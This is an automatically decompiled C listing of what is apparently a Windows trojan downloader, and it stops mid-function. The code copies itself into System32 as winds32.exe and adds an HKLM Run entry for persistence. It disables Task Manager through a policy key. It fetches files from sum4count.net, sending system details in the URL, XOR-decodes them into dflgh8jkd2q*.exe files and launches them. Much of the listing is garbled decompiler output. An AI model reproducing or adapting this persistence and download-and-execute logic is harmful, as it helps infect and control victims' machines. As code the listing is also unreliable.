//
// This file was generated by the Retargetable Decompiler
// Website: https://retdec.com
// Copyright (c) Retargetable Decompiler <info@retdec.com>
//

#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

// ------------------------ Structures ------------------------

struct _EXCEPTION_RECORD {
    int32_t e0;
    int32_t e1;
    struct _EXCEPTION_RECORD * e2;
    int32_t * e3;
    int32_t e4;
    int32_t e5[1];
};

struct _M128A {
    int32_t e0;
    int64_t e1;
};

struct _CONTEXT {
    int32_t e0;
    int32_t e1;
    int32_t e2;
    int32_t e3;
    int32_t e4;
    int32_t e5;
    int32_t e6;
    int32_t e7;
    int16_t e8;
    int16_t e9;
    int16_t e10;
    int16_t e11;
    int16_t e12;
    int16_t e13;
    int32_t e14;
    int32_t e15;
    int32_t e16;
    int32_t e17;
    int32_t e18;
    int32_t e19;
    int32_t e20;
    int32_t e21;
    int32_t e22;
    int32_t e23;
    int32_t e24;
    int32_t e25;
    int32_t e26;
    int32_t e27;
    int32_t e28;
    int32_t e29;
    int32_t e30;
    int32_t e31;
    int32_t e32;
    int32_t e33;
    int32_t e34;
    int32_t e35;
    int32_t e36;
    int32_t e37;
    int32_t e38;
    struct _M128A e39[26];
    int32_t e40;
    int32_t e41;
    int32_t e42;
    int32_t e43;
    int32_t e44;
    int32_t e45;
};

struct _OSVERSIONINFOA {
    int32_t e0;
    int32_t e1;
    int32_t e2;
    int32_t e3;
    int32_t e4;
    char e5[128];
};

struct _PROCESS_INFORMATION {
    int32_t * e0;
    int32_t * e1;
    int32_t e2;
    int32_t e3;
};

struct _SECURITY_ATTRIBUTES {
    int32_t e0;
    int32_t * e1;
    bool e2;
};

struct _STARTUPINFOA {
    int32_t e0;
    char * e1;
    char * e2;
    char * e3;
    int32_t e4;
    int32_t e5;
    int32_t e6;
    int32_t e7;
    int32_t e8;
    int32_t e9;
    int32_t e10;
    int32_t e11;
    int16_t e12;
    int16_t e13;
    char * e14;
    int32_t * e15;
    int32_t * e16;
    int32_t * e17;
};

struct _SYSTEMTIME {
    int16_t e0;
    int16_t e1;
    int16_t e2;
    int16_t e3;
    int16_t e4;
    int16_t e5;
    int16_t e6;
    int16_t e7;
};

struct _SYSTEM_INFO {
    int32_t e0;
    int32_t e1;
    int32_t * e2;
    int32_t * e3;
    int32_t e4;
    int32_t e5;
    int32_t e6;
    int32_t e7;
    int16_t e8;
    int16_t e9;
};

struct tagPOINT {
    int32_t e0;
    int32_t e1;
};

struct tagMSG {
    int32_t * e0;
    int32_t e1;
    int32_t e2;
    int32_t e3;
    int32_t e4;
    struct tagPOINT e5;
};

// ------------------- Function Prototypes --------------------

int32_t entry_point(void);
int32_t function_401000(int32_t nNumberOfBytesToWrite);
int32_t function_401110(int32_t lpFileName, int32_t lpBuffer, int32_t nNumberOfBytesToWrite);
int32_t function_401163(int32_t str);
int32_t function_4012ee(int32_t * str, char * str2);
int32_t function_40134e(void);
int32_t function_4014ba(int32_t lpFileName, int32_t a2);
int32_t function_4015b3(void);
int32_t function_4015e5(int32_t a1);
int32_t function_401604(void);
int32_t function_401fc2(int32_t hModule);
int32_t function_40258c(int32_t wLang, char * szLang, int32_t cchLang);
int32_t function_402592(char * s);
char * function_402598(char * dest, char * src);
int32_t * function_40259e(int32_t * s, int32_t c, int32_t n);
int32_t function_4025a4(void);
int32_t function_4026e2(void);
int32_t function_402702(int32_t xcptnum, int32_t * pxcptinfoptrs);
void function_402708(void (**First)(), void (**Last)());
int32_t function_40270e(void);
int32_t function_402720(void);
int32_t function_402723(void);
int32_t function_402730(struct _EXCEPTION_RECORD * exception_record, int32_t registration, struct _CONTEXT * context, int32_t dispatcher);
int32_t function_402736(int32_t NewValue, int32_t Mask);

// --------------------- Global Variables ---------------------

int32_t g1;

// ------------------------ Functions -------------------------

// Address range: 0x401000 - 0x401105
int32_t function_401000(int32_t nNumberOfBytesToWrite) {
    int32_t lpNumberOfBytesRead = 0; // bp-12, 0x40101b
    int32_t v1 = nNumberOfBytesToWrite; // bp-84, 0x40103b
    char * lpFileName = (char *)nNumberOfBytesToWrite; // 0x40103c
    int32_t * fileHandle = CreateFileA(lpFileName, -0x40000000, 3, NULL, 3, 128, NULL); // 0x40103c
    if (fileHandle == (int32_t *)-1) {
        // 0x401100
        return *(int32_t *)((int32_t)&v1 + 28);
    }
    int32_t dwSize = GetFileSize(fileHandle, NULL); // 0x401054
    int32_t v2 = 0; // bp-108, 0x401065
    int32_t * memory = VirtualAlloc(NULL, dwSize, 0x1000, 4); // 0x401067
    int32_t * fileHandle2 = fileHandle; // 0x40106f
    int32_t * v3 = &v2; // 0x40106f
    if (memory != NULL) {
        int32_t v4 = (int32_t)memory; // 0x401067
        ReadFile(fileHandle, memory, dwSize, &lpNumberOfBytesRead, NULL);
        CloseHandle(fileHandle);
        int32_t v5 = *(int32_t *)0x401105;
        bool v6; // 0x401000
        int32_t v7 = v6 ? -4 : 4; // 0x4010ae
        int32_t v8 = (dwSize - v5) / 4 + 1; // 0x4010ad
        int32_t v9 = v5 + v4; // 0x4010ad
        int32_t v10 = v4; // 0x4010ad
        *(int32_t *)v10 = *(int32_t *)0x401109 ^ *(int32_t *)v9;
        v8--;
        v9 += v7;
        v10 += v7;
        while (v8 != 0) {
            // 0x4010ae
            *(int32_t *)v10 = *(int32_t *)0x401109 ^ *(int32_t *)v9;
            v8--;
            v9 += v7;
            v10 += v7;
        }
        // 0x4010b8
        fileHandle2 = CreateFileA(lpFileName, -0x40000000, 3, NULL, 3, 128, NULL);
        WriteFile(fileHandle2, (int32_t *)-0x40000000, nNumberOfBytesToWrite, &lpNumberOfBytesRead, NULL);
        int32_t v11 = v4; // bp-192, 0x4010ee
        VirtualFree(memory, 0, 0x8000);
        v3 = &v11;
    }
    int32_t v12 = (int32_t)v3 - 4; // 0x4010f7
    *(int32_t *)v12 = (int32_t)fileHandle2;
    CloseHandle(&g1);
    // 0x401100
    return *(int32_t *)(v12 + 28);
}

// Address range: 0x401110 - 0x401163
int32_t function_401110(int32_t lpFileName, int32_t lpBuffer, int32_t nNumberOfBytesToWrite) {
    int32_t lpNumberOfBytesWritten = lpFileName;
    int32_t * fileHandle = CreateFileA((char *)lpFileName, -0x40000000, 0, NULL, 4, 128, NULL); // 0x401129
    Sleep(0);
    SetFilePointer(fileHandle, 0, NULL, 2);
    WriteFile(fileHandle, (int32_t *)lpBuffer, nNumberOfBytesToWrite, &lpNumberOfBytesWritten, NULL);
    CloseHandle(fileHandle);
    return 1;
}

// Address range: 0x401163 - 0x401224
int32_t function_401163(int32_t str) {
    // 0x401163
    strlen((char *)str);
    int32_t * moduleHandle = LoadLibraryA("WININET.DLL"); // 0x40118e
    GetProcAddress(moduleHandle, "InternetOpenA");
    GetProcAddress(moduleHandle, "InternetOpenUrlA");
    GetProcAddress(moduleHandle, "HttpQueryInfoA");
    GetProcAddress(moduleHandle, "InternetReadFile");
    return (int32_t)GetProcAddress(moduleHandle, "InternetCloseHandle");
}

// Address range: 0x401224 - 0x4012ee
int32_t entry_point(void) {
    // 0x401224
    int32_t v1; // 0x401224
    int32_t uFlags; // 0x401224
    int32_t v2; // 0x401224
    int32_t v3; // 0x401224
    if (v3 != uFlags) {
        // 0x401233
        *(int32_t *)(v2 - 40) = 4;
        int32_t v4; // bp-20, 0x401224
        if (v2 == 24) {
            // 0x40129e
            *(int32_t *)(v2 - 4) = 4;
            v1 = &v4;
            goto lab_0x4012b5;
        } else {
            int32_t v5 = *(int32_t *)(v2 - 24); // 0x401250
            if (v5 == uFlags) {
                // 0x40129e
                *(int32_t *)(v2 - 4) = 4;
                v1 = &v4;
                goto lab_0x4012b5;
            } else {
                int32_t * memoryHandle = LocalAlloc(uFlags, v5 + 128); // 0x40125e
                int32_t * v6 = (int32_t *)(v2 - 8); // 0x401267
                *v6 = (int32_t)memoryHandle;
                int32_t v7; // bp-44, 0x401224
                int32_t v8 = &v7; // 0x40126f
                if (memoryHandle != NULL) {
                    // 0x401280
                    v1 = v8;
                    if (function_401110(*(int32_t *)(v2 + 8), *v6, *(int32_t *)(v2 - 44)) == 0) {
                        // 0x401295
                        *(int32_t *)(v2 - 4) = 6;
                        v1 = v8;
                    }
                } else {
                    // 0x401277
                    *(int32_t *)(v2 - 4) = 5;
                    v1 = v8;
                }
                goto lab_0x4012b5;
            }
        }
    } else {
        // 0x4012b1
        *(int32_t *)(v2 - 4) = 3;
        goto lab_0x4012b9;
    }
  lab_0x4012b9:;
    int32_t v9 = *(int32_t *)(v2 - 12); // 0x4012b9
    int32_t v10; // 0x401224
    int32_t v11 = v10; // 0x4012bc
    if (v9 != uFlags) {
        int32_t v12 = v10 - 4; // 0x4012be
        *(int32_t *)v12 = v9;
        v11 = v12;
    }
    int32_t v13 = v11; // 0x4012c6
    int32_t v14; // 0x401224
    if (v14 != uFlags) {
        // 0x4012c8
        FreeLibrary(&g1);
        v13 = v11 - 4;
    }
    int32_t v15 = *(int32_t *)(v2 - 8); // 0x4012cf
    int32_t v16 = v13; // 0x4012d8
    if (v15 != uFlags) {
        int32_t v17 = v13 - 4; // 0x4012da
        *(int32_t *)v17 = v15;
        LocalFree(&g1);
        v16 = v17;
    }
    // 0x4012df
    *(int32_t *)(v16 - 4) = *(int32_t *)(v2 + 8);
    LocalFree(&g1);
    return *(int32_t *)(v2 - 4);
  lab_0x4012b5:
    // 0x4012b5
    v10 = v1 - 4;
    goto lab_0x4012b9;
}

// Address range: 0x4012ee - 0x40134e
int32_t function_4012ee(int32_t * str, char * str2) {
    int32_t len = strlen((char *)str);
    int32_t lpThreadId = len; // bp-8, 0x4012fe
    int32_t * memoryHandle = LocalAlloc(64, len + 16 + strlen(str2)); // 0x401312
    strcpy((char *)memoryHandle, (char *)str);
    strcpy((char *)(int32_t (*)(int32_t *))(len + 1 + (int32_t)memoryHandle), str2);
    return (int32_t)CreateThread(NULL, 0, (int32_t (*)(int32_t *))0x401163, memoryHandle, 0, &lpThreadId);
}

// Address range: 0x40134e - 0x4014ba
int32_t function_40134e(void) {
    // 0x40134e
    int32_t v1; // bp-100, 0x40134e
    memset(&v1, 0, 68);
    v1 = 68;
    int32_t v2; // bp-32, 0x40134e
    memset(&v2, 0, 16);
    int32_t lpBuffer; // bp-616, 0x40134e
    GetSystemDirectoryA((char *)&lpBuffer, 260);
    int32_t hModule = *(int32_t *)0x405790; // 0x40139d
    int32_t lpFilename; // bp-1388, 0x40134e
    GetModuleFileNameA((int32_t *)hModule, (char *)&lpFilename, 260);
    int32_t lpOut; // bp-360, 0x40134e
    wsprintfA((char *)&lpOut, "%s\\winds32.exe", &lpBuffer);
    DeleteFileA((char *)&lpOut);
    CopyFileA((char *)&lpFilename, (char *)&lpOut, false);
    int32_t hModule2 = *(int32_t *)0x405790; // 0x4013ee
    int32_t lpFilename2; // bp-1644, 0x40134e
    GetModuleFileNameA((int32_t *)hModule2, (char *)&lpFilename2, 260);
    int32_t v3; // bp-1128, 0x40134e
    int32_t v4; // bp-872, 0x40134e
    _splitpath((char *)&lpFilename2, NULL, NULL, (char *)&v4, (char *)&v3);
    int32_t lpOut2; // bp-1900, 0x40134e
    wsprintfA((char *)&lpOut2, "%s%s", &v4, &v3);
    int32_t phkResult; // bp-8, 0x40134e
    RegOpenKeyExA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, (int32_t **)&phkResult);
    int32_t len = strlen((char *)&lpOut); // 0x401455
    RegSetValueExA((int32_t *)phkResult, "System32", 0, 1, (char *)&lpOut, len + 1);
    RegFlushKey((int32_t *)phkResult);
    int32_t lpData = 1; // bp-16, 0x401485
    int32_t phkResult2; // bp-12, 0x40134e
    RegCreateKeyA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", (int32_t **)&phkResult2);
    RegSetValueExA((int32_t *)phkResult2, "DisableTaskMgr", 0, 4, (char *)&lpData, 4);
    return RegFlushKey((int32_t *)phkResult2);
}

// Address range: 0x4014ba - 0x4015b3
int32_t function_4014ba(int32_t lpFileName, int32_t a2) {
    int32_t lpString1 = 32; // bp-524, 0x4014d1
    int32_t v1; // bp-522, 0x4014ba
    __asm_rep_stosd_memset((char *)&v1, 0, 127);
    int32_t lpNumberOfBytesRead = 0; // bp-12, 0x4014f4
    bool v2; // 0x4014ba
    *(int16_t *)((v2 ? -508 : 508) + (int32_t)&v1) = 0;
    int32_t * fileHandle = CreateFileA((char *)lpFileName, -0x40000000, 0, NULL, 4, (int32_t)&g1, &g1); // 0x4014f9
    int32_t nNumberOfBytesToRead = GetFileSize(fileHandle, NULL); // 0x401503
    int32_t * memoryHandle = LocalAlloc(64, nNumberOfBytesToRead + 1); // 0x401511
    ReadFile(fileHandle, memoryHandle, nNumberOfBytesToRead, &lpNumberOfBytesRead, NULL);
    CloseHandle(fileHandle);
    char * v3 = (char *)&lpString1; // bp-612, 0x40153e
    lstrcpyA((char *)&lpString1, (char *)memoryHandle);
    lpNumberOfBytesRead = 0;
    int32_t len = strlen((char *)&lpString1); // 0x401552
    int32_t v4 = (int32_t)&v3; // 0x401559
    int32_t * v5; // 0x4014ba
    int32_t v6; // 0x4014ba
    if (len == 0) {
        // 0x4014ba
        v6 = &lpString1;
        v5 = (int32_t *)(v4 - 4);
    } else {
        int32_t * v7 = (int32_t *)(v4 - 4);
        int32_t v8 = &lpString1;
        int32_t v9 = 0; // 0x40158d
        int32_t v10 = 1;
        char v11 = 68;
        int32_t v12; // bp-4, 0x4014ba
        char * v13 = (char *)((int32_t)&v12 - 520 + v9); // 0x40155c
        char v14 = *v13; // 0x40155c
        int32_t v15; // 0x4014ba
        char v16; // 0x4014ba
        if (v14 != 32) {
            if (v14 != 46) {
                // 0x401581
                *v13 = v14 + (char)v10;
                v16 = v11;
                v15 = -v10;
            } else {
                // 0x401577
                *v13 = v11;
                v16 = v11 + 1;
                v15 = v10;
            }
        } else {
            // 0x40156e
            *v13 = 33;
            v16 = v11;
            v15 = v10;
        }
        int32_t v17 = v15;
        char v18 = v16;
        v9++;
        *v7 = v8;
        uint32_t len2 = strlen((char *)&g1); // 0x40158f
        v6 = v8;
        v5 = v7;
        while (v9 < len2) {
            // 0x40155c
            v10 = v17;
            v11 = v18;
            v13 = (char *)((int32_t)&v12 - 520 + v9);
            v14 = *v13;
            if (v14 != 32) {
                if (v14 != 46) {
                    // 0x401581
                    *v13 = v14 + (char)v10;
                    v16 = v11;
                    v15 = -v10;
                } else {
                    // 0x401577
                    *v13 = v11;
                    v16 = v11 + 1;
                    v15 = v10;
                }
            } else {
                // 0x40156e
                *v13 = 33;
                v16 = v11;
                v15 = v10;
            }
            // 0x401587
            v17 = v15;
            v18 = v16;
            v9++;
            *v7 = v8;
            len2 = strlen((char *)&g1);
            v6 = v8;
            v5 = v7;
        }
    }
    // 0x401599
    *v5 = (int32_t)memoryHandle;
    LocalFree(&g1);
    *(int32_t *)(v4 - 8) = v6;
    *(int32_t *)(v4 - 12) = a2;
    return (int32_t)lstrcpyA((char *)&g1, (char *)&g1);
}

// Address range: 0x4015b3 - 0x4015e5
int32_t function_4015b3(void) {
    int32_t * moduleHandle = LoadLibraryA("urlmon.dll"); // 0x4015b9
    GetProcAddress(moduleHandle, "URLDownloadToFileA");
    return FreeLibrary(moduleHandle);
}

// Address range: 0x4015e5 - 0x401604
int32_t function_4015e5(int32_t a1) {
    // 0x4015e5
    int32_t lpOut; // bp-12, 0x4015e5
    wsprintfA((char *)&lpOut, "%d", a1);
    return lpOut;
}

// Address range: 0x401604 - 0x401fc2
int32_t function_401604(void) {
    // 0x401604
    char * v1; // bp-3168, 0x401604
    memset((int32_t *)&v1, 0, 68);
    *(int32_t *)&v1 = 68;
    int32_t v2; // bp-3184, 0x401604
    memset(&v2, 0, 16);
    GetTempPathA(260, "C:\\DOCUME~1\\USER\\TEMP\\");
    GetSystemDirectoryA("C:\\WINDOWS\\SYSTEM32", 260);
    wsprintfA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q1.exe", "%s\\dflgh8jkd2q1.exe");
    wsprintfA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q2.exe", "%s\\dflgh8jkd2q2.exe");
    wsprintfA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q5.exe", "%s\\dflgh8jkd2q5.exe");
    wsprintfA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q6.exe", "%s\\dflgh8jkd2q6.exe");
    wsprintfA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q7.exe", "%s\\dflgh8jkd2q7.exe");
    wsprintfA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q8.exe", "%s\\dflgh8jkd2q8.exe");
    int32_t lpDst; // bp-2340, 0x401604
    ExpandEnvironmentStringsA("C:\\WINDOWS\\SYSTEM32\\vx.tll", (char *)&lpDst, 260);
    int32_t lpDst2; // bp-288, 0x401604
    ExpandEnvironmentStringsA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q1.exe", (char *)&lpDst2, 260);
    int32_t lpDst3; // bp-1844, 0x401604
    ExpandEnvironmentStringsA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q2.exe", (char *)&lpDst3, 260);
    int32_t lpDst4; // bp-2636, 0x401604
    ExpandEnvironmentStringsA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q5.exe", (char *)&lpDst4, 260);
    int32_t lpDst5; // bp-2128, 0x401604
    ExpandEnvironmentStringsA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q6.exe", (char *)&lpDst5, 260);
    int32_t lpDst6; // bp-1620, 0x401604
    char * lpExitCode = (char *)&lpDst6; // bp-3296, 0x401706
    ExpandEnvironmentStringsA("C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q7.exe", (char *)&lpDst6, 260);
    int32_t hModule = *(int32_t *)0x405790; // 0x401717
    int32_t v3 = hModule; // bp-3312, 0x401717
    int32_t lpFilename; // bp-1116, 0x401604
    GetModuleFileNameA((int32_t *)hModule, (char *)&lpFilename, 260);
    int32_t v4; // bp-1128, 0x401604
    char * v5 = (char *)&v4; // bp-3332, 0x40173c
    int32_t v6; // bp-1384, 0x401604
    int32_t v7; // bp-616, 0x401604
    _splitpath((char *)&v4, NULL, NULL, (char *)&v6, (char *)&v7);
    int32_t lpOut; // bp-2940, 0x401604
    wsprintfA((char *)&lpOut, "%s%s", &v6, &v7);
    int32_t v8 = _stricmp((char *)&lpOut, "winds32.exe");
    int32_t v9 = &v3;
    int32_t v10; // 0x401604
    int32_t lpOut2; // bp-3200, 0x401604
    if (*(char *)0x405794 == 0) {
        // 0x4017ab
        v10 = v9;
        if (v8 != 0) {
            // 0x4017b7
            wsprintfA((char *)&lpOut2, "%s\\4.dflb", "C:\\DOCUME~1\\USER\\TEMP\\");
            v5 = (char *)&lpOut2;
            int32_t v11 = function_4012ee(&lpOut2, "http://sum4count.net/adv/0/adload.php?a1=United States&a2=Type of Procfssor: PENTIUM PRO or PENTIUM II/III&a3=Windowd versign is 5.1&a4=Build: 2600, Platform ID: d&a5=ntoutpost&table=adv"); // 0x4017d2
            int32_t * hHandle = (int32_t *)v11;
            WaitForSingleObject(hHandle, -1);
            GetExitCodeThread(hHandle, (int32_t *)&lpExitCode);
            v5 = (char *)v11;
            CloseHandle(hHandle);
            v10 = (int32_t)&v5;
        }
    } else {
        // 0x40177a
        v10 = v9;
        if (v8 != 0) {
            // 0x401786
            wsprintfA((char *)&lpOut2, "%s\\4.dflb", "C:\\DOCUME~1\\USER\\TEMP\\");
            v5 = "http://sum4count.net/adv/0/adload.php?a1=United States&a2=Type of Procfssor: PENTIUM PRO or PENTIUM II/III&a3=Windowd versign is 5.1&a4=Build: 2600, Platform ID: d&a5=ntoutpost&table=adv";
            function_4015b3();
            v10 = v9;
        }
    }
    // 0x4017f8
    *(int32_t *)(v10 + 20) = 1;
    int32_t v12 = v10 - 4; // 0x40180b
    *(int32_t *)v12 = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q8.exe";
    int32_t v13 = v12;
    DeleteFileA((char *)&g1);
    int32_t v14 = v13 - 4; // 0x40180e
    int32_t * v15 = (int32_t *)v14;
    *v15 = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q8.exe";
    int32_t v16 = v13 - 8; // 0x40180f
    int32_t * v17 = (int32_t *)v16;
    *v17 = (int32_t)"http://sum4count.net/rftghjkljhgfdsdfgh.php?adv=&code1=HNIC&code2=1100";
    function_4015b3();
    int32_t v18 = v13 - 12; // 0x401819
    int32_t * v19 = (int32_t *)v18;
    *v19 = (int32_t)"NO";
    int32_t v20 = v13 - 16; // 0x40181e
    int32_t * v21 = (int32_t *)v20;
    *v21 = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q8.exe";
    function_4014ba((int32_t)&g1, (int32_t)&g1);
    int32_t * v22 = (int32_t *)(v13 - 20);
    *v22 = (int32_t)"NO";
    while (strlen((char *)&g1) < 4) {
        // 0x401836
        if (*(int32_t *)(v13 + 20) > 3) {
            // 0x40184f
            *v15 = (int32_t)"NO";
            *v17 = (int32_t)"NO";
            wsprintfA((char *)&g1, (char *)&g1);
            goto lab_0x40185d;
        }
        // 0x40183d
        *v15 = 1000;
        Sleep((int32_t)&g1);
        int32_t * v23 = (int32_t *)(v13 + 16); // 0x401848
        *v23 = *v23 + 1;
        *v17 = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q8.exe";
        v13 = v16;
        DeleteFileA((char *)&g1);
        v14 = v13 - 4;
        v15 = (int32_t *)v14;
        *v15 = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q8.exe";
        v16 = v13 - 8;
        v17 = (int32_t *)v16;
        *v17 = (int32_t)"http://sum4count.net/rftghjkljhgfdsdfgh.php?adv=&code1=HNIC&code2=1100";
        function_4015b3();
        v18 = v13 - 12;
        v19 = (int32_t *)v18;
        *v19 = (int32_t)"NO";
        v20 = v13 - 16;
        v21 = (int32_t *)v20;
        *v21 = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q8.exe";
        function_4014ba((int32_t)&g1, (int32_t)&g1);
        v22 = (int32_t *)(v13 - 20);
        *v22 = (int32_t)"NO";
    }
    goto lab_0x40185d;
  lab_0x401f86:;
    // 0x401f86
    int32_t v54; // 0x401604
    int32_t v55 = v54;
    *(int32_t *)(v55 - 4) = v55 + 28;
    *(int32_t *)(v55 - 8) = v55 + 44;
    *(int32_t *)(v55 - 12) = 0;
    *(int32_t *)(v55 - 16) = 0;
    *(int32_t *)(v55 - 20) = 0;
    *(int32_t *)(v55 - 24) = 0;
    *(int32_t *)(v55 - 28) = 0;
    *(int32_t *)(v55 - 32) = 0;
    *(int32_t *)(v55 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q5.exe";
    *(int32_t *)(v55 - 40) = 0;
    CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
    int32_t v56 = v55 - 44; // 0x401f9e
    *(int32_t *)v56 = 0x1b7740;
    *(char *)0x405c9f = 1;
    Sleep((int32_t)&g1);
    v54 = v56;
    goto lab_0x401f86;
  lab_0x401a3e:;
    // 0x401a3e
    int32_t v39; // 0x401604
    int32_t v57 = v39;
    int32_t v58 = v57; // 0x401a44
    int32_t v59; // 0x401604
    if (*(char *)0x405c9e != 0) {
        goto lab_0x401b20;
    } else {
        // 0x401a4a
        v59 = v57;
        if (*(char *)0x405c99 != 0) {
            goto lab_0x401afa;
        } else {
            int32_t v60 = v57 - 4; // 0x401a5d
            int32_t * v61 = (int32_t *)v60; // 0x401a5d
            *v61 = v57 + 1408;
            int32_t v62 = GetFileAttributesA((char *)&g1); // 0x401a5e
            v59 = v60;
            if (v62 != -1) {
                goto lab_0x401afa;
            } else {
                int32_t * v63 = (int32_t *)(v57 - 8); // 0x401a6d
                *v63 = (int32_t)"C:\\DOCUME~1\\USER\\TEMP\\";
                int32_t v64 = v57 + 108; // 0x401a72
                int32_t * v65 = (int32_t *)(v57 - 12); // 0x401a76
                *v65 = (int32_t)"%s\\2.dflb";
                int32_t * v66 = (int32_t *)(v57 - 16); // 0x401a7b
                *v66 = v64;
                wsprintfA((char *)&g1, (char *)&g1);
                *v63 = v64;
                DeleteFileA((char *)&g1);
                *v65 = (int32_t)"http://sum4count.net/pic/null.jpg";
                *v66 = v57 + 104;
                int32_t v67 = function_4012ee(&g1, (char *)&g1); // 0x401a92
                int32_t v68 = v57 + 8; // 0x401a98
                *(int32_t *)v68 = v67;
                *v65 = -1;
                *v66 = v67;
                WaitForSingleObject(&g1, (int32_t)&g1);
                *(int32_t *)(v57 - 20) = v68;
                *(int32_t *)(v57 - 24) = *(int32_t *)v57;
                bool v69 = GetExitCodeThread(&g1, &g1); // 0x401aaf
                int32_t v70 = v57 - 28; // 0x401ab5
                *(int32_t *)v70 = *v63;
                *v61 = (int32_t)v69;
                CloseHandle(&g1);
                v58 = v70;
                if (*v63 != 0) {
                    // 0x401ac9
                    v58 = v70;
                    if (*v61 == 0) {
                        // 0x401acf
                        *(int32_t *)(v57 - 32) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q2.exe";
                        DeleteFileA((char *)&g1);
                        *(int32_t *)(v57 - 36) = v57 + 80;
                        function_401000((int32_t)&g1);
                        *(int32_t *)(v57 - 40) = 0;
                        *(int32_t *)(v57 - 44) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q2.exe";
                        int32_t v71 = v57 - 48; // 0x401aea
                        *(int32_t *)v71 = v57 + 76;
                        CopyFileA((char *)&g1, (char *)&g1, (bool)&g1);
                        *(char *)0x405c99 = 1;
                        v58 = v71;
                    }
                }
                goto lab_0x401b20;
            }
        }
    }
  lab_0x401b20:;
    int32_t v72 = v58;
    int32_t v73 = v72; // 0x401b26
    int32_t v74; // 0x401604
    if (*(char *)0x405c9f != 0) {
        goto lab_0x401c02;
    } else {
        // 0x401b2c
        v74 = v72;
        if (*(char *)0x405c9a != 0) {
            goto lab_0x401bdc;
        } else {
            int32_t v75 = v72 - 4; // 0x401b3f
            int32_t * v76 = (int32_t *)v75; // 0x401b3f
            *v76 = v72 + 628;
            int32_t v77 = GetFileAttributesA((char *)&g1); // 0x401b40
            v74 = v75;
            if (v77 != -1) {
                goto lab_0x401bdc;
            } else {
                int32_t * v78 = (int32_t *)(v72 - 8); // 0x401b4f
                *v78 = (int32_t)"C:\\DOCUME~1\\USER\\TEMP\\";
                int32_t v79 = v72 + 108; // 0x401b54
                int32_t * v80 = (int32_t *)(v72 - 12); // 0x401b58
                *v80 = (int32_t)"%s\\5.dflb";
                int32_t * v81 = (int32_t *)(v72 - 16); // 0x401b5d
                *v81 = v79;
                wsprintfA((char *)&g1, (char *)&g1);
                *v78 = v79;
                DeleteFileA((char *)&g1);
                *v80 = (int32_t)"http://sum4count.net/pic/null.jpg";
                *v81 = v72 + 104;
                int32_t v82 = function_4012ee(&g1, (char *)&g1); // 0x401b74
                int32_t v83 = v72 + 8; // 0x401b7a
                *(int32_t *)v83 = v82;
                *v80 = -1;
                *v81 = v82;
                WaitForSingleObject(&g1, (int32_t)&g1);
                *(int32_t *)(v72 - 20) = v83;
                *(int32_t *)(v72 - 24) = *(int32_t *)v72;
                bool v84 = GetExitCodeThread(&g1, &g1); // 0x401b91
                int32_t v85 = v72 - 28; // 0x401b97
                *(int32_t *)v85 = *v78;
                *v76 = (int32_t)v84;
                CloseHandle(&g1);
                v73 = v85;
                if (*v78 != 0) {
                    // 0x401bab
                    v73 = v85;
                    if (*v76 == 0) {
                        // 0x401bb1
                        *(int32_t *)(v72 - 32) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q5.exe";
                        DeleteFileA((char *)&g1);
                        *(int32_t *)(v72 - 36) = v72 + 80;
                        function_401000((int32_t)&g1);
                        *(int32_t *)(v72 - 40) = 0;
                        *(int32_t *)(v72 - 44) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q5.exe";
                        int32_t v86 = v72 - 48; // 0x401bcc
                        *(int32_t *)v86 = v72 + 76;
                        CopyFileA((char *)&g1, (char *)&g1, (bool)&g1);
                        *(char *)0x405c9a = 1;
                        v73 = v86;
                    }
                }
                goto lab_0x401c02;
            }
        }
    }
  lab_0x401a18:;
    // 0x401a18
    int32_t v40; // 0x401604
    int32_t v87 = v40;
    *(char *)0x405c98 = 1;
    *(int32_t *)(v87 - 4) = v87 + 28;
    *(int32_t *)(v87 - 8) = v87 + 44;
    *(int32_t *)(v87 - 12) = 0;
    *(int32_t *)(v87 - 16) = 0;
    *(int32_t *)(v87 - 20) = 0;
    *(int32_t *)(v87 - 24) = 0;
    *(int32_t *)(v87 - 28) = 0;
    *(int32_t *)(v87 - 32) = 0;
    *(int32_t *)(v87 - 36) = (int32_t)"C:\\WINDOWS\\SYSTEM32\\dflgh8jkd2q1.exe";
    int32_t v88 = v87 - 40; // 0x401a34
    *(int32_t *)v88 = 0;
    CreateProcessA((char *)&g1, (char *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (struct _SECURITY_ATTRIBUTES *)&g1, (bool)&g1, (int32_t)&g1, &g1, (char *)&g1, (struct _STARTUPINFOA *)&g1, (struct _PROCESS_INFORMATION *)&g1);
    *(char *)0x405c9d = 1;
    v39 = v88;
    goto lab_0x401a3e;
  lab_0x401c02:;
    int32_t v89 = v73;
